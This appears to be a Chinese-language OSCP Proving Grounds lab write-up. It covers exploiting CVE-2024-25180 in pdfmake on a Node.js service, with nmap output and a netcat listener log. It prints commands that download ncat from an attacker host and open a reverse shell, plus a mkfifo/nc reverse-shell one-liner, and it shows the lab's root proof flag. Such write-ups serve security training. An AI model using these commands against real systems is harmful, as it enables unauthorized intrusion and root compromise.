OSCP - Proving Grounds - CVE-2024-25180
主要知识点
-
相关cve漏洞利用
具体步骤
nmap开始两个端口开放,22和1234
Nmap scan report for 192.168.54.42
Host is up (0.00069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
1234/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
其中1234端口开放了一个pdfmake,虽然不知道具体的版本,不过google一下 发现CVE-2024-25180排名比较靠前,于是尝试一下Arbitrary Code Injection in pdfmake | CVE-2024-25180 | Snyk
将PoC中的CMD替换成下面的命令依次执行
- wget 192.168.45.225:8000/ncat -O /tmp/ncat
- chmod +x /tmp/ncat
- /tmp/ncat -e /bin/bash 192.168.45.225 80
反弹shell就会被创建,这里其实有别的方法,不用这么麻烦,一条命令 rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc192.168.45.225 80>/tmp/f 也可以
C:\home\kali\Documents\OFFSEC\GoToWork\CVE-2024-25180> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.225] from (UNKNOWN) [192.168.216.42] 51610
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
304d16aa1f75f007766dafa3eed9ec03